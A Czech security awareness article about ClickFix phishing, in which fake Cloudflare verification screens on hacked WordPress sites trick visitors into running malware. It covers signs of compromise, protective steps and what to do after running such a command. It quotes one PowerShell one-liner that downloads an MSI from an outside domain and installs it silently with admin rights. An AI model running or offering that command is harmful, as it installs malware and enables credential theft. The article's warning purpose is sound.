Pozor na fake Cloudflare ověření: nový phishing, který vás přiměje nainstalovat si malware sami
Na první pohled to vypadá důvěryhodně: Otevřete web a zobrazí se známá obrazovka s ověřením „I’m not a robot“ nebo „Checking your browser before accessing…“. Vizuálně připomíná známou Cloudflare ochranu proti botům, kterou dnes používají tisíce webů.
Jenže místo běžného kliknutí vás stránka vyzve, abyste otevřeli Mac Terminal, Příkazový řádek nebo Windows Run, vložili zkopírovaný příkaz a spustili ho. A přesně v tu chvíli si do počítače sami nainstalujete malware.
Tomuto typu útoku se říká ClickFix. Útočníci zneužívají důvěru lidí v CAPTCHA a Cloudflare obrazovky a přesvědčí návštěvníka, aby spustil škodlivý PowerShell nebo shell příkaz přímo ve svém systému.
Jak útok vypadá
Scénář je jednoduchý. Uživatel přijde na legitimní web, který byl kompromitovaný hackery. Stránka zobrazí falešné Cloudflare ověření a následně návštěvníka navede k tomu, aby pomocí Win + R nebo Terminalu spustil příkaz, který stáhne malware z internetu.
Zpravidla jde o tzv. Infostealery; malware zaměřený na krádež hesel, cookies, uložených přihlášení, kryptopeněženek nebo firemních účtů.
Jak zdůrazňuje také techradar.com, útok je nebezpečný hlavně proto, že uživatel malware spustí sám. Nejde tedy o klasické stažení souboru, které by browser nebo antivirus snadno zastavil.
Důležité pravidlo: žádný legitimní web po vás nikdy nebude chtít otevírat Terminal
Žádné legitimní Cloudflare ověření nikdy nechce, abyste otevírali Terminal, PowerShell nebo Windows Run.
Pokud po vás web chce vložit příkaz do Terminalu, spouštět PowerShell nebo používat Win + R, jde téměř jistě o malware nebo phishing.
Toto je škodlivý kód, který vás hackeři přimějí vložit do Terminalu:
$u=“https://securrity.click/cloud-utils.msi“;$m=“$env:TEMP\cloud-utils.msi“;Invoke-WebRequest -Uri $u -OutFile $m;Unblock-File $m;Start-Process „$env:SystemRoot\System32\msiexec.exe“ -ArgumentList „/i `“$m`“ /qn /norestart“ -Verb RunAs -Wait
Jak se phishing dostane na WordPress web
Tady začíná druhá část problému. Většina lidí si myslí, že hacker „hackne Cloudflare“. Ve skutečnosti je ale kompromitovaný samotný WordPress web.
Nejčastějším scénářem bývají zastaralé pluginy nebo šablony. Stačí jediná známá zranitelnost a útočník získá možnost nahrávat soubory, upravovat databázi nebo spouštět vlastní PHP kód.
Rizikové bývají hlavně nulled pluginy, opuštěné pluginy bez podpory nebo staré buildery, které nikdo roky neaktualizoval.
Útoky jsou navíc z velké části automatizované. Hackeři neútočí ručně na jeden konkrétní web. Robotické skenery neustále procházejí internet a hledají WordPress instalace se známými chybami. Jakmile takový web najdou, pokusí se do něj automaticky proniknout. (techradar.com)
Dalším častým problémem jsou slabá hesla nebo uniklé přístupy. Pokud administrátor používá stejné heslo na více službách nebo má infikovaný počítač, útočník může získat přístup do WordPressu, FTP nebo hostingu bez nutnosti hledat technickou zranitelnost.
Co hacker po průniku do WordPressu udělá
Po získání přístupu se útočníci obvykle snaží vytvořit způsob, jak se do webu vracet i v budoucnu. Často proto nahrají vlastní plugin, upraví functions.php nebo vloží škodlivý JavaScript přímo do databáze.
Moderní malware bývá velmi nenápadný. Někdy se phishing zobrazí jen Windows uživatelům, návštěvníkům z určitých zemí nebo pouze při první návštěvě webu. Administrátor si proto dlouho nemusí ničeho všimnout.
Celý problém dobře vysvětluje tento článek na reddit.com. Netlas.io pak podrobně popisuje fungování ClickFix útoků.
Ve většině případů útočníci vloží do webu škodlivý JavaScript, který rozhoduje, komu se falešná Cloudflare obrazovka zobrazí. Některé kampaně používají externí servery nebo blockchain infrastrukturu, aby se hůř blokovaly a detekovaly.
Jak poznat, že je WordPress kompromitovaný
Napadený WordPress se často nechová podezřele na první pohled. Přesto existují signály, které by vás měly varovat:
- web přesměrovává jen někdy nebo jen některé návštěvníky
- Google označí web jako nebezpečný
- antiviry hlásí malware
- ve WordPressu se objeví neznámý administrátor
- ve zdrojovém kódu jsou podezřelé skripty
- návštěvníci hlásí falešné CAPTCHA obrazovky
Právě selektivní zobrazování je důvod, proč podobné infekce často vydrží aktivní týdny nebo měsíce.
Jak se proti tomu chránit
Základem je pravidelná aktualizace WordPressu, pluginů i šablon.
Velké riziko představují také nulled pluginy a šablony stažené z neoficiálních zdrojů.
Důležité je používat silná hesla a dvoufaktorové ověření pro WordPress administraci i pro FTP, hosting a e-mail.
Pomáhá také omezit počet pluginů na minimum.
Velkou roli hraje i kvalitní hosting a bezpečnostní ochrana na úrovni infrastruktury. Moderní WAF a monitoring dokážou část útoků zastavit ještě předtím, než se dostanou do WordPressu. U managed WordPress hostingu navíc poskytovatel často řeší aktualizace, monitoring nebo bezpečnostní pravidla za vás.
Co dělat, pokud jste příkaz už spustili
Pokud jste podobný příkaz už vložili do Terminalu nebo PowerShellu, jednejte okamžitě:
- Odpojte zařízení od internetu
- změňte hesla z jiného zařízení
- odhlaste se ze všech služeb
- následně spusťte antivirovou kontrolu
- a v ideálním případě proveďte kompletní reinstalaci systému
Na Redditu najdete spoustu uživatelů, kteří sdílí své zkušenosti s tímto malwarem.
Proč jsou tyto útoky tak úspěšné
Protože nezneužívají technickou chybu v počítači uživatele. Zneužívají důvěru.
Lidé jsou dnes zvyklí klikat na CAPTCHA, věřit Cloudflare obrazovkám a automaticky následovat instrukce.
Také stojí za přečtení:
